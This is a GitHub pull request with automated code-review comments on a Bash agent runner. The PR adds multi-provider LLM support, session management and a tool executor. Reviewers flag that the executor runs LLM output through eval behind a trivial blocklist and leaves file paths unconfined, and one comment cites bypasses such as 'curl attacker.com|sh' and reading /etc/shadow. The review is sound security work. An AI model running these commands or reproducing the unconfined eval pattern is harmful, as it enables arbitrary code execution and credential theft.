feat: implement multi-provider support and session management#172
feat: implement multi-provider support and session management#172mwaldheim wants to merge 13 commits intofrankbria:mainfrom
Conversation
This change introduces a provider-based architecture to support multiple LLM backends (Claude, Gemini, Copilot). It also adds a session manager and tool executor to centralize execution logic and improve session continuity. - Added lib/providers/base.sh, claude.sh, gemini.sh, copilot.sh - Added lib/session_manager.sh and lib/tool_executor.sh - Updated ralph_enable.sh and ralph_loop.sh to use the new provider system - Added tests for providers and updated existing tests
|
Note Reviews pausedIt looks like this branch is under active development. To avoid overwhelming you with review comments due to an influx of new commits, CodeRabbit has automatically paused this review. You can configure this behavior by changing the Use the following commands to manage reviews:
Use the checkboxes below for quick actions:
WalkthroughConverts Ralph from a Claude-only supervisor into a provider-agnostic agent runtime: adds a provider abstraction and adapters (Claude/Gemini/Copilot), session management, a tool executor, provider selection in the enable flow, and refactors the main loop to load and delegate to provider_execute for agentic tool-driven workflows. Changes
Sequence DiagramsequenceDiagram
participant User
participant RalphLoop as ralph_loop.sh
participant ProviderBase as lib/providers/base.sh
participant Provider as Selected Provider\n(claude/gemini/copilot)
participant SessionMgr as lib/session_manager.sh
participant ToolExec as lib/tool_executor.sh
participant AIBackend as AI Backend\n(API/CLI)
User->>RalphLoop: start
RalphLoop->>ProviderBase: load_provider()
ProviderBase->>Provider: source provider script
Provider-->>ProviderBase: ready
ProviderBase-->>RalphLoop: loaded
RalphLoop->>Provider: provider_init()
Provider->>SessionMgr: get_session_id()
SessionMgr-->>Provider: session_id
Provider-->>RalphLoop: initialized
loop main loop
RalphLoop->>Provider: provider_execute(loop_count,prompt,live)
Provider->>Provider: build_loop_context()
Provider->>AIBackend: run AI with prompt
AIBackend-->>Provider: raw output
Provider->>ToolExec: run_tools_if_requested(output)
ToolExec->>AIBackend: perform tool actions (read/write/run/list)
AIBackend-->>ToolExec: tool results
ToolExec-->>Provider: aggregated results
Provider->>SessionMgr: log_session_transition()
Provider-->>RalphLoop: execution result
end
RalphLoop->>User: finish
Estimated code review effort🎯 4 (Complex) | ⏱️ ~70 minutes Possibly related PRs
Poem
🚥 Pre-merge checks | ✅ 3✅ Passed checks (3 passed)
✏️ Tip: You can configure your own custom pre-merge checks in the settings. ✨ Finishing touches🧪 Generate unit tests (beta)
Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out. Comment |
Add multi-provider execution with provider loader, session management, and per-provider runners for Claude, Gemini, and Copilot across
|
There was a problem hiding this comment.
Actionable comments posted: 16
Caution
Some comments are outside the diff and can’t be posted inline due to platform limitations.
⚠️ Outside diff range comments (6)
README.md (1)
5-5:⚠️ Potential issue | 🟡 MinorVersion badge is stale — still shows
0.11.4while line 19 declaresv0.12.0.Line 850 ("Current Status: v0.11.4") has the same mismatch. Update both the badge and the roadmap section to reflect the new version.
Proposed fix for the badge
- +tests/unit/test_session_continuity.bats (1)
77-99:⚠️ Potential issue | 🟡 MinorTest descriptions are now stale — they reference
ralph_loop.shbut the helper searcheslib/session_manager.sh.Lines 86, 91, and 96 have test names like
"reset_session function exists in ralph_loop.sh"butfunction_exists_in_ralphnow searcheslib/session_manager.sh. Update the test names to match the actual search target.Proposed fix
-@test "reset_session function exists in ralph_loop.sh" { +@test "reset_session function exists in session_manager.sh" { run function_exists_in_ralph "reset_session" [[ $status -eq 0 ]] || skip "reset_session function not yet implemented" } -@test "get_session_id function exists in ralph_loop.sh" { +@test "get_session_id function exists in session_manager.sh" { run function_exists_in_ralph "get_session_id" [[ $status -eq 0 ]] || skip "get_session_id function not yet implemented" } -@test "log_session_transition function exists in ralph_loop.sh" { +@test "log_session_transition function exists in session_manager.sh" { run function_exists_in_ralph "log_session_transition" [[ $status -eq 0 ]] || skip "log_session_transition function not yet implemented" }As per coding guidelines, test quality must validate behavior, not just achieve coverage metrics — accurate test names are part of that quality.
ralph_enable.sh (2)
607-611:⚠️ Potential issue | 🔴 Critical
phase_provider_selection()is defined but never called — provider is always unset.The new
phase_provider_selection(line 342) is never invoked inmain(). As a result,CONFIG_PROVIDERis never set,ENABLE_PROVIDERexports an empty value (line 486), and the provider summary line (line 432) is blank. The generated.ralphrcwill have an emptyRALPH_PROVIDER.Proposed fix
# Run phases phase_environment_detection phase_task_source_selection + phase_provider_selection phase_configuration phase_file_generation phase_verification
512-517:⚠️ Potential issue | 🟡 MinorStale phase numbering in
phase_verification.Lines 513 and 517 still reference "Phase 5 of 5", but the wizard now has 6 phases. This is inconsistent with the updated headers in phases 3–5.
Proposed fix
-# PHASE 5: VERIFICATION +# PHASE 6: VERIFICATION # ============================================================================= phase_verification() { - print_header "Verification" "Phase 5 of 5" + print_header "Verification" "Phase 6 of 6"CLAUDE.md (2)
25-61:⚠️ Potential issue | 🟡 MinorDuplicate library component listings — old items 3–7 not removed.
The new numbered list (lines 25–33) supersedes the old items, but the old entries for
lib/date_utils.sh(line 35),lib/timeout_utils.sh(line 40),lib/enable_core.sh(line 47),lib/wizard_utils.sh(line 53), andlib/task_sources.sh(line 58) were left in place. This creates duplicate and potentially contradictory documentation (e.g.,date_utils.shappears as both item 9 and item 3).Remove lines 35–61 or merge their detail into the new list.
296-298:⚠️ Potential issue | 🟡 MinorGlobal Installation section not updated for new provider scripts.
Line 298 still lists only the legacy libraries (
circuit_breaker.sh,response_analyzer.sh,date_utils.sh, etc.) under~/.ralph/lib/. The new provider scripts (lib/providers/base.sh,lib/providers/claude.sh, etc.) andsession_manager.sh/tool_executor.share missing. This will mislead users about what gets installed.
🤖 Fix all issues with AI agents
In `@lib/providers/base.sh`:
- Around line 5-21: The load_provider function uses RALPH_PROVIDER directly to
build provider_name/provider_script, allowing path traversal; validate/sanitize
RALPH_PROVIDER before use (in load_provider): restrict to an allowlist of valid
provider base names (e.g., "claude", "openai", etc.) or reject/normalize any
value containing path separators or traversal tokens (/, \, ..), then derive
provider_name from the validated value and construct provider_script only from
that safe name; ensure any fallback using BASH_SOURCE also uses the sanitized
provider_name and fail with log_status "ERROR" if validation rejects the input.
In `@lib/providers/claude.sh`:
- Around line 323-333: The function get_session_file_age_hours returns "0" for a
missing file which makes non-existent sessions appear fresh; change its behavior
to return "-1" on missing files (same sentinel used for unresolvable timestamps)
so callers like init_claude_session treat missing files as expired/invalid;
update the early check in get_session_file_age_hours (the [[ ! -f "$file" ]]
branch) to echo "-1" and return, keeping the rest of the stat fallbacks and
numeric handling unchanged.
- Around line 241-244: The progress writer currently interpolates last_line
directly into JSON which can break if it contains quotes, backslashes, or
newlines; change the block that writes to PROGRESS_FILE so it constructs the
JSON safely (e.g., use jq or printf + jq) rather than direct shell
interpolation: take the variables progress_counter, last_line, and the
timestamp, pass/escape last_line through jq/stringify and produce {
"status":"executing", "elapsed_seconds": (progress_counter * 10), "last_output":
last_line, "timestamp": ... } robustly; update the code around PROGRESS_FILE,
last_line and progress_counter to use jq or proper JSON-escaping before writing
the file.
- Around line 59-74: The inner-loop currently accepts any Bash(...) tool because
the regex check is hardcoded; update the validation in the tools loop so each
tool is matched against the current VALID_TOOL_PATTERNS entry instead of a
catch-all Bash regex — when iterating patterns in the for loop (the variable
named pattern), perform glob-style matching of tool against the pattern (e.g.,
use the pattern unquoted in the [[ "$tool" == $pattern ]] test or translate the
whitelist pattern to a proper regex) so whitelist entries like Bash(git *) match
Bash(git log) but Bash(rm -rf /) does not; keep the surrounding trimming and
empty-check logic and return the same error/exit behavior on mismatch.
- Around line 160-164: The function mutates the global variable
CLAUDE_OUTPUT_FORMAT when LIVE_OUTPUT is true, causing the override to persist
across iterations; fix by creating a local variable (e.g., output_format)
initialized from CLAUDE_OUTPUT_FORMAT, adjust it to "json" when
LIVE_OUTPUT=="true", and use output_format throughout this function (including
where build_claude_command is called) instead of mutating CLAUDE_OUTPUT_FORMAT;
alternatively save the original value and restore it before returning to avoid
global leakage.
In `@lib/providers/copilot.sh`:
- Around line 52-56: The multi-line invocation of $COPILOT_CMD is being treated
as separate commands; fix the call so all arguments and the stdout/stderr
redirection apply to the single command by joining the lines properly (either
put the entire invocation on one line or add backslash continuations) so that
$COPILOT_CMD receives -p "$full_prompt", $session_arg, --allow-all-tools,
--no-ask-user and the final > "$output_file" 2>&1 applies to that single
command; update the call in lib/providers/copilot.sh where COPILOT_CMD,
session_arg and output_file are used.
In `@lib/providers/gemini.sh`:
- Around line 16-19: The provider_execute function currently accepts a live_mode
parameter that is not used; either remove the unused parameter from
provider_execute (and update callers) if Gemini does not support live output, or
add handling inside provider_execute to detect live_mode being truthy and emit a
clear warning/log (e.g., "live mode not supported for Gemini") before
proceeding; reference the provider_execute function and the live_mode variable
when making the change so callers and logs are updated consistently.
- Around line 24-28: The code currently builds session_arg as a string
("session_arg=\"--resume latest\"") and relies on unquoted expansion to split it
into two arguments, which is fragile; change session_arg to an array (initialize
session_arg=() and set session_arg=(--resume latest) when CLAUDE_USE_CONTINUE ==
"true") and then use the array expansion "${session_arg[@]}" at the command
invocation site so the optional resume flag is passed safely as separate
arguments; refer to the session_arg variable and the CLAUDE_USE_CONTINUE check
to locate where to make the change.
- Around line 30-33: The code builds full_prompt using literal "\n" sequences so
full_prompt ends up containing backslash-n instead of real newlines; update the
construction of full_prompt to generate actual newlines (e.g., use printf or
similar) when combining loop_context and prompt_content so
build_loop_context/loop_context and prompt_content are joined with real newline
characters before sending to Gemini (replace the current full_prompt assignment
with a printf-based concatenation).
- Around line 65-86: The build_loop_context function is duplicated in gemini.sh
and claude.sh; extract it into a single shared helper (e.g.,
lib/providers/base.sh or lib/providers/common.sh) containing the
build_loop_context() implementation, then remove the duplicated function bodies
from both gemini.sh and claude.sh and add a single source line (e.g., source
lib/providers/base.sh) at the top of each file so both scripts use the shared
implementation; ensure the shared file expects RALPH_DIR and jq/grep to be
available (or document/export RALPH_DIR if necessary) and keep the function name
build_loop_context unchanged so callers need no edits.
In `@lib/session_manager.sh`:
- Around line 53-81: In log_session_transition, ensure loop_number is a safe
numeric before using jq --argjson: validate/coerce the local variable
loop_number (set by ${4:-0}) to an integer (e.g., if empty or non-numeric,
replace with 0 or use arithmetic expansion/regex) and then pass that sanitized
numeric to jq; keep the rest of the function (get_iso_timestamp, transition,
history, and writing to RALPH_SESSION_HISTORY_FILE) unchanged but reference the
sanitized loop_number when building transition so --argjson loop_number
"$loop_number" cannot fail.
- Around line 46-48: reset_session currently uses an implicit caller-scoped
variable loop_count in the log_session_transition call; make loop_count an
explicit parameter to reset_session (or read it as a positional arg) and pass it
to log_session_transition (use a default of 0 if not supplied) so the function
no longer relies on dynamic scope; update the reset_session signature/parameter
handling and replace "${loop_count:-0}" with the explicit parameter (or
"${2:-0}") and keep the call to log_session_transition "active" "reset"
"$reason" "<explicit_loop_count>".
In `@lib/tool_executor.sh`:
- Around line 67-68: Split declaration and assignment for the temporary
variables: declare local results_file and temp_blocks_dir separately, then
assign each with command substitution (results_file=$(mktemp) and
temp_blocks_dir=$(mktemp -d)) and immediately check the return/status (or test
for non-empty) after each mktemp; if mktemp fails, log an error and exit to
avoid running dangerous operations like rm -rf "$temp_blocks_dir". Ensure
references to results_file and temp_blocks_dir (used later, e.g., in
cleanup/removal) only proceed after the successful creation checks.
- Around line 13-35: The read_file and write_file handlers accept an unvalidated
LLM-supplied path (variable path) and can be exploited for path traversal; fix
by canonicalizing and confining paths to the project root before any file
access: resolve user expansions and relative segments (e.g. expand ~, use
realpath -m or equivalent on $path and on the project root), verify the resolved
path begins with the resolved project root prefix, reject and log any paths
outside that root (return an error rather than reading/writing), and when
writing ensure mkdir -p and writes operate only on the confined resolved path
and that parent directories are inside the root; apply these checks in both the
"read_file" and "write_file" branches that reference $path and $file_content
(use $tool_name in error logs).
- Around line 37-49: The run_command case uses eval on untrusted AI output
(variable cmd) which allows arbitrary command execution; remove eval "$cmd" and
instead validate and execute safely: implement an allowlist check against the
requested executable/first token (in the run_command handler) and reject
anything not explicitly permitted, run the allowed command inside a sandboxed
runner (e.g., Docker/firejail/bwrap invocation) with a restricted working
directory and no network, require interactive user confirmation for any
non-trivial command, and capture/relay stdout, stderr and exit code from the
sandboxed process back to the caller; update the run_command logic to perform
these checks before execution and return a clear error when a command is
disallowed.
In `@ralph_loop.sh`:
- Around line 794-796: The module-level call to load_provider runs before
load_ralphrc and causes the default provider (claude) to be loaded twice and
validate_allowed_tools to validate against the wrong provider; remove or comment
out the top-level load_provider invocation and instead call load_provider from
main() after load_ralphrc() (or ensure load_provider is invoked before any
provider-dependent checks), and update call-sites so validate_allowed_tools runs
only after load_provider has loaded the user-configured RALPH_PROVIDER.
🧹 Nitpick comments (14)
lib/providers/base.sh (1)
14-16: Suppress SC1090 with a directive since dynamic sourcing is intentional here.Proposed fix
if [[ -f "$provider_script" ]]; then + # shellcheck source=/dev/null source "$provider_script"tests/unit/test_providers.bats (2)
50-69: Function-existence tests will produce confusing failures if sourcing the provider script errors out.Since
sourceanddeclare -Fare called directly (not viarun), any missing dependency in the provider script will abort the test with an opaque error instead of a clear assertion. Wrapping inrunwould make failures more readable.Proposed refactor (example for claude)
`@test` "claude provider implements required functions" { - source "$BATS_TEST_DIRNAME/../../lib/providers/claude.sh" - declare -F provider_init - declare -F provider_execute - declare -F validate_allowed_tools + run bash -c " + source '$BATS_TEST_DIRNAME/../../lib/providers/claude.sh' && + declare -F provider_init && + declare -F provider_execute && + declare -F validate_allowed_tools + " + assert_success }
1-69: Consider adding a test for an invalid/unknown provider name to cover the error path.
load_providerexits with status 1 for missing providers — verifying this behavior would improve coverage of the base loader.`@test` "load_provider fails for unknown provider" { export RALPH_PROVIDER="nonexistent" export RALPH_HOME="$BATS_TEST_DIRNAME/../.." source "$BATS_TEST_DIRNAME/../../lib/providers/base.sh" run load_provider [[ $status -ne 0 ]] [[ "$output" == *"ERROR"* ]] }lib/providers/copilot.sh (3)
16-23: Unused variableslive_modeandsession_file.
live_mode(line 19) is accepted as a parameter but never used — the function doesn't support streaming.session_file(line 23) is declared but never read. Either use them or remove/document them as intentional placeholders.
80-101:build_loop_contextis duplicated across all three providers.This function is identical in
claude.sh,gemini.sh, andcopilot.sh(confirmed by the relevant code snippets). Extract it intolib/providers/base.shor a shared utility to follow DRY.
8-13:provider_initcallsexit 1instead ofreturn 1.Calling
exitfrom a sourced library terminates the entire shell. Other init paths (e.g.,load_providerinbase.sh) already callexit 1, so this works today, but areturn 1with the caller handling the error would be more composable and testable.IMPLEMENTATION_PLAN_MULTI_PROVIDER.md (1)
1-65: Plan is out of sync with the implementation shipping in this same PR.The plan references
provider_chatandprovider_parse(line 9) but the actual implementations useprovider_executeandvalidate_allowed_tools. All checkboxes are unchecked despite most items being implemented in this PR. The estimated effort (lines 61–65) only covers Phases 1–3 but there are 5 phases listed.Consider updating the plan to reflect the actual interface and marking completed items, or remove this file if it's purely historical and move relevant notes to a design doc or ADR.
ANALYSIS_REPORT.md (1)
27-31: Interface names in analysis don't match the implemented API.The analysis references
init_session(),send_message(prompt, context), andparse_response(output)as the provider interface, but the actual implementations useprovider_init(),provider_execute(loop_count, prompt_file, live_mode), and rely onanalyze_response()from the shared response analyzer. Consider updating this document to match, or add a note that the final interface evolved.lib/session_manager.sh (3)
83-86:$RANDOMprovides limited uniqueness for session IDs.
$RANDOMyields values 0–32767. Combined with a Unix timestamp (1-second resolution), two sessions created within the same second have a ~1-in-32768 collision chance. This is probably fine for a single-user CLI tool, but if stronger guarantees are ever needed, consider appending$$(PID) or using/dev/urandom:echo "ralph-$(date +%s)-$(head -c 4 /dev/urandom | od -An -tx1 | tr -d ' ')"
110-115: Non-atomic read-modify-write of the session file.Line 114 reads
RALPH_SESSION_FILEvia jq, and line 115 writes the result back to the same file. If jq fails mid-read or the process is interrupted between read and write, the file could be truncated/corrupted. Write to a temp file andmvatomically:Proposed fix
update_session_last_used() { [[ ! -f "$RALPH_SESSION_FILE" ]] && return 0 local ts ts=$(get_iso_timestamp) local updated updated=$(jq --arg last_used "$ts" '.last_used = $last_used' "$RALPH_SESSION_FILE" 2>/dev/null) - [[ -n "$updated" ]] && echo "$updated" > "$RALPH_SESSION_FILE" + if [[ -n "$updated" ]]; then + local tmp_file="${RALPH_SESSION_FILE}.tmp" + echo "$updated" > "$tmp_file" && mv "$tmp_file" "$RALPH_SESSION_FILE" + fi }
25-25: ShellCheck SC2155: Declare and assign separately throughout the file.Multiple lines combine
localdeclaration with command substitution (e.g.,local ts=$(get_iso_timestamp)), which masks the return value of the command. This is flagged by ShellCheck on lines 25, 58, 60, 90, 92, 113, and 114.The idiomatic pattern is:
local ts ts=$(get_iso_timestamp)This applies to all
local var=$(...)assignments in this file. Consider fixing across the board for consistency.Also applies to: 58-60, 90-92, 113-114
lib/providers/gemini.sh (1)
25-25: Provider-specific code referencesCLAUDE_USE_CONTINUE.The Gemini provider checks a Claude-named variable (
CLAUDE_USE_CONTINUE) to decide whether to resume a session. This is a leaky abstraction — the variable should be provider-agnostic (e.g.,RALPH_USE_CONTINUEorPROVIDER_USE_CONTINUE) and set in the base provider or configuration layer.lib/providers/claude.sh (2)
251-253: Same JSON injection pattern in success/failure progress writes.Lines 253 and 282 also use string interpolation with
$(date ...)inside JSON. Whiledateoutput is predictable here and unlikely to contain special characters, these should also usejqfor consistency with the fix on line 243.Also applies to: 281-282
293-312:build_claude_commandsets a global arrayCLAUDE_CMD_ARGS— document or scope it.
CLAUDE_CMD_ARGSis populated as a side-effect (line 298). This is the core mechanism by which the caller retrieves the built command, but it's undeclared and undocumented as a global contract. Also, line 311 embeds the entire prompt file content into a command-line argument via$(cat "$prompt_file")— very large prompt files could exceedARG_MAX(typically 2MB on Linux).Consider adding a comment documenting the global, and for robustness, validate the prompt file size.
| log_session_transition() { | ||
| local from_state=$1 | ||
| local to_state=$2 | ||
| local reason=$3 | ||
| local loop_number=${4:-0} | ||
| local ts=$(get_iso_timestamp) | ||
|
|
||
| local transition=$(jq -n -c \ | ||
| --arg timestamp "$ts" \ | ||
| --arg from_state "$from_state" \ | ||
| --arg to_state "$to_state" \ | ||
| --arg reason "$reason" \ | ||
| --argjson loop_number "$loop_number" \ | ||
| '{ | ||
| timestamp: $timestamp, | ||
| from_state: $from_state, | ||
| to_state: $to_state, | ||
| reason: $reason, | ||
| loop_number: $loop_number | ||
| }') | ||
|
|
||
| local history='[]' | ||
| if [[ -f "$RALPH_SESSION_HISTORY_FILE" ]]; then | ||
| history=$(cat "$RALPH_SESSION_HISTORY_FILE" 2>/dev/null) | ||
| jq empty <<<"$history" 2>/dev/null || history='[]' | ||
| fi | ||
|
|
||
| echo "$history" | jq ". += [$transition] | .[-50:]" > "$RALPH_SESSION_HISTORY_FILE" | ||
| } |
There was a problem hiding this comment.
--argjson will error if loop_number is non-numeric.
Line 65 uses --argjson loop_number "$loop_number" which expects a valid JSON number. If the caller passes an empty string or non-numeric value, jq will fail and transition will be empty — silently producing a corrupt history entry via line 80. The default on line 57 (${4:-0}) mitigates this for the missing-argument case, but not for an explicitly passed non-numeric value.
Consider validating or coercing to integer:
Proposed fix
- local loop_number=${4:-0}
+ local loop_number=${4:-0}
+ [[ "$loop_number" =~ ^[0-9]+$ ]] || loop_number=0🧰 Tools
🪛 Shellcheck (0.11.0)
[warning] 58-58: Declare and assign separately to avoid masking return values.
(SC2155)
[warning] 60-60: Declare and assign separately to avoid masking return values.
(SC2155)
🤖 Prompt for AI Agents
In `@lib/session_manager.sh` around lines 53 - 81, In log_session_transition,
ensure loop_number is a safe numeric before using jq --argjson: validate/coerce
the local variable loop_number (set by ${4:-0}) to an integer (e.g., if empty or
non-numeric, replace with 0 or use arithmetic expansion/regex) and then pass
that sanitized numeric to jq; keep the rest of the function (get_iso_timestamp,
transition, history, and writing to RALPH_SESSION_HISTORY_FILE) unchanged but
reference the sanitized loop_number when building transition so --argjson
loop_number "$loop_number" cannot fail.
| "read_file") | ||
| local path=$(echo "$content" | perl -0777 -ne 'print $1 if /<arg name="path">(.*?)<\/arg>/s') | ||
| if [[ -f "$path" ]]; then | ||
| echo "--- TOOL RESULT ($tool_name) ---" | ||
| cat "$path" | ||
| echo "-------------------------------" | ||
| else | ||
| echo "Error: File not found: $path" | ||
| fi | ||
| ;; | ||
| "write_file") | ||
| local path=$(echo "$content" | perl -0777 -ne 'print $1 if /<arg name="path">(.*?)<\/arg>/s') | ||
| local file_content=$(echo "$content" | perl -0777 -ne 'print $1 if /<arg name="content">(.*?)<\/arg>/s') | ||
|
|
||
| if [[ -n "$path" ]]; then | ||
| mkdir -p "$(dirname "$path")" | ||
| echo "$file_content" > "$path" | ||
| echo "--- TOOL RESULT ($tool_name) ---" | ||
| echo "Successfully wrote to $path" | ||
| echo "-------------------------------" | ||
| else | ||
| echo "Error: Missing path for write_file" | ||
| fi |
There was a problem hiding this comment.
Path traversal risk in read_file and write_file.
Both handlers accept an LLM-supplied path without any validation or confinement. A malicious or hallucinating model can read sensitive files (/etc/passwd, ~/.ssh/id_rsa) or write to arbitrary locations (../../.bashrc, /tmp/crontab). Validate that path resolves to a location within the project directory.
Sketch: confine paths to the project root
+# Resolve and validate path is within project root
+validate_path() {
+ local target="$1"
+ local resolved
+ resolved="$(cd "$(dirname "$target")" 2>/dev/null && pwd)/$(basename "$target")"
+ local project_root
+ project_root="$(pwd)"
+ if [[ "$resolved" != "$project_root"/* ]]; then
+ echo "Error: Path outside project directory: $target" >&2
+ return 1
+ fi
+ echo "$resolved"
+}🧰 Tools
🪛 Shellcheck (0.11.0)
[warning] 14-14: Declare and assign separately to avoid masking return values.
(SC2155)
[warning] 24-24: Declare and assign separately to avoid masking return values.
(SC2155)
[warning] 25-25: Declare and assign separately to avoid masking return values.
(SC2155)
🤖 Prompt for AI Agents
In `@lib/tool_executor.sh` around lines 13 - 35, The read_file and write_file
handlers accept an unvalidated LLM-supplied path (variable path) and can be
exploited for path traversal; fix by canonicalizing and confining paths to the
project root before any file access: resolve user expansions and relative
segments (e.g. expand ~, use realpath -m or equivalent on $path and on the
project root), verify the resolved path begins with the resolved project root
prefix, reject and log any paths outside that root (return an error rather than
reading/writing), and when writing ensure mkdir -p and writes operate only on
the confined resolved path and that parent directories are inside the root;
apply these checks in both the "read_file" and "write_file" branches that
reference $path and $file_content (use $tool_name in error logs).
| "run_command") | ||
| local cmd=$(echo "$content" | perl -0777 -ne 'print $1 if /<arg name="command">(.*?)<\/arg>/s') | ||
| if [[ -n "$cmd" ]]; then | ||
| if [[ "$cmd" == *"rm -rf /"* ]]; then | ||
| echo "Error: Dangerous command blocked" | ||
| else | ||
| echo "--- TOOL RESULT ($tool_name) ---" | ||
| eval "$cmd" 2>&1 | ||
| echo "-------------------------------" | ||
| fi | ||
| else | ||
| echo "Error: Missing command for run_command" | ||
| fi |
There was a problem hiding this comment.
Critical security: eval on LLM-generated input is an arbitrary command execution vulnerability.
Line 44 runs eval "$cmd" where $cmd is extracted from AI output. The safety check on line 40 only blocks the literal string rm -rf / — trivially bypassed with rm -rf /*, curl attacker.com|sh, cat /etc/shadow, reverse shells, etc. A blocklist approach cannot secure eval against untrusted input.
At minimum, consider:
- Running commands in a sandboxed environment (Docker,
firejail,bwrap) - Using an allowlist of permitted commands instead of a blocklist
- Requiring explicit user confirmation before execution
- Restricting execution to a project-scoped working directory
Sketch of an allowlist approach
"run_command")
local cmd
cmd=$(echo "$content" | perl -0777 -ne 'print $1 if /<arg name="command">(.*?)<\/arg>/s')
if [[ -n "$cmd" ]]; then
- if [[ "$cmd" == *"rm -rf /"* ]]; then
- echo "Error: Dangerous command blocked"
- else
- echo "--- TOOL RESULT ($tool_name) ---"
- eval "$cmd" 2>&1
- echo "-------------------------------"
- fi
+ # Allowlist: only permit known safe command prefixes
+ local allowed=false
+ for pattern in "git " "npm " "pytest" "bats " "ls " "cat " "grep "; do
+ if [[ "$cmd" == ${pattern}* ]]; then
+ allowed=true
+ break
+ fi
+ done
+ if [[ "$allowed" == "true" ]]; then
+ echo "--- TOOL RESULT ($tool_name) ---"
+ bash -c "$cmd" 2>&1
+ echo "-------------------------------"
+ else
+ echo "Error: Command not in allowlist: $cmd"
+ fi
else
echo "Error: Missing command for run_command"
fi🧰 Tools
🪛 Shellcheck (0.11.0)
[warning] 38-38: Declare and assign separately to avoid masking return values.
(SC2155)
🤖 Prompt for AI Agents
In `@lib/tool_executor.sh` around lines 37 - 49, The run_command case uses eval on
untrusted AI output (variable cmd) which allows arbitrary command execution;
remove eval "$cmd" and instead validate and execute safely: implement an
allowlist check against the requested executable/first token (in the run_command
handler) and reject anything not explicitly permitted, run the allowed command
inside a sandboxed runner (e.g., Docker/firejail/bwrap invocation) with a
restricted working directory and no network, require interactive user
confirmation for any non-trivial command, and capture/relay stdout, stderr and
exit code from the sandboxed process back to the caller; update the run_command
logic to perform these checks before execution and return a clear error when a
command is disallowed.
| local results_file=$(mktemp) | ||
|
|
There was a problem hiding this comment.
Declare and assign separately for results_file and temp_blocks_dir.
Per SC2155, combining local and command substitution masks the return value of mktemp. If mktemp fails, the variable silently gets an empty string and subsequent operations (like rm -rf "$temp_blocks_dir" on line 85) could behave dangerously.
Proposed fix
- local results_file=$(mktemp)
+ local results_file
+ results_file=$(mktemp) || { echo "Error: mktemp failed"; return 1; }
local found_tools=false
- local temp_blocks_dir=$(mktemp -d)
+ local temp_blocks_dir
+ temp_blocks_dir=$(mktemp -d) || { rm -f "$results_file"; echo "Error: mktemp -d failed"; return 1; }📝 Committable suggestion
‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.
| local results_file=$(mktemp) | |
| local results_file | |
| results_file=$(mktemp) || { echo "Error: mktemp failed"; return 1; } | |
| local found_tools=false | |
| local temp_blocks_dir | |
| temp_blocks_dir=$(mktemp -d) || { rm -f "$results_file"; echo "Error: mktemp -d failed"; return 1; } |
🧰 Tools
🪛 Shellcheck (0.11.0)
[warning] 67-67: Declare and assign separately to avoid masking return values.
(SC2155)
🤖 Prompt for AI Agents
In `@lib/tool_executor.sh` around lines 67 - 68, Split declaration and assignment
for the temporary variables: declare local results_file and temp_blocks_dir
separately, then assign each with command substitution (results_file=$(mktemp)
and temp_blocks_dir=$(mktemp -d)) and immediately check the return/status (or
test for non-empty) after each mktemp; if mktemp fails, log an error and exit to
avoid running dangerous operations like rm -rf "$temp_blocks_dir". Ensure
references to results_file and temp_blocks_dir (used later, e.g., in
cleanup/removal) only proceed after the successful creation checks.
| # Load AI provider | ||
| load_provider | ||
|
|
There was a problem hiding this comment.
load_provider called at module level before .ralphrc is loaded — provider loaded twice, possibly with different backends.
load_provider here (line 795) runs before argument parsing and before load_ralphrc() (which is called inside main() at line 531). Since RALPH_PROVIDER hasn't been read from .ralphrc yet, this always loads the default claude provider. Then main() calls load_provider again (line 538) after .ralphrc is loaded, potentially sourcing a different provider.
This means validate_allowed_tools (line 876, called during argument parsing) runs against the default provider's implementation, not the one the user configured. Consider deferring the first load_provider to after .ralphrc is sourced, or restructuring so validate_allowed_tools doesn't depend on provider loading.
One approach: remove module-level load, defer to main
-# Load AI provider
-load_provider
-
# Parse command line arguments
while [[ $# -gt 0 ]]; doThen in main(), ensure load_provider runs before any provider-dependent validation (or move --allowed-tools validation into main after the provider is loaded).
🤖 Prompt for AI Agents
In `@ralph_loop.sh` around lines 794 - 796, The module-level call to load_provider
runs before load_ralphrc and causes the default provider (claude) to be loaded
twice and validate_allowed_tools to validate against the wrong provider; remove
or comment out the top-level load_provider invocation and instead call
load_provider from main() after load_ralphrc() (or ensure load_provider is
invoked before any provider-dependent checks), and update call-sites so
validate_allowed_tools runs only after load_provider has loaded the
user-configured RALPH_PROVIDER.
lib/providers/copilot.sh
Outdated
| $COPILOT_CMD -p "$full_prompt" | ||
| $session_arg | ||
| --allow-all-tools | ||
| --no-ask-user | ||
| > "$output_file" 2>&1 |
There was a problem hiding this comment.
🟠 High
providers/copilot.sh:52 Missing backslashes for line continuation causes this to execute as separate commands. The Copilot command runs without its flags, and $output_file ends up empty. Consider adding \ at the end of lines 52-55.
| $COPILOT_CMD -p "$full_prompt" | |
| $session_arg | |
| --allow-all-tools | |
| --no-ask-user | |
| > "$output_file" 2>&1 | |
| $COPILOT_CMD -p "$full_prompt" \ | |
| $session_arg \ | |
| --allow-all-tools \ | |
| --no-ask-user \ | |
| > "$output_file" 2>&1 |
🚀 Want me to fix this? Reply ex: "fix it for me".
🤖 Prompt for AI
In file lib/providers/copilot.sh around lines 52-56:
Missing backslashes for line continuation causes this to execute as separate commands. The Copilot command runs without its flags, and `$output_file` ends up empty. Consider adding `\` at the end of lines 52-55.
| echo "Error: Dangerous command blocked" | ||
| else | ||
| echo "--- TOOL RESULT ($tool_name) ---" | ||
| eval "$cmd" 2>&1 |
There was a problem hiding this comment.
🔴 Critical
lib/tool_executor.sh:44 Using eval with LLM output is a critical security vulnerability. The blocklist only checks for the literal string rm -rf / and is trivially bypassed (rm -rf ~, rm -rf /*, reverse shells, etc.). Consider removing eval entirely and using a strict allowlist of permitted commands, or sandboxing execution.
🚀 Want me to fix this? Reply ex: "fix it for me".
🤖 Prompt for AI
In file lib/tool_executor.sh around line 44:
Using `eval` with LLM output is a critical security vulnerability. The blocklist only checks for the literal string `rm -rf /` and is trivially bypassed (`rm -rf ~`, `rm -rf /*`, reverse shells, etc.). Consider removing `eval` entirely and using a strict allowlist of permitted commands, or sandboxing execution.
lib/providers/base.sh
Outdated
|
|
||
| # Load the configured provider | ||
| load_provider() { | ||
| local provider_name="${RALPH_PROVIDER:-claude}" |
There was a problem hiding this comment.
🔴 Critical
providers/base.sh:6 RALPH_PROVIDER is used to construct a path without validation. Path traversal sequences like ../../tmp/evil could source arbitrary scripts. Consider validating that the provider name contains only alphanumeric characters and hyphens.
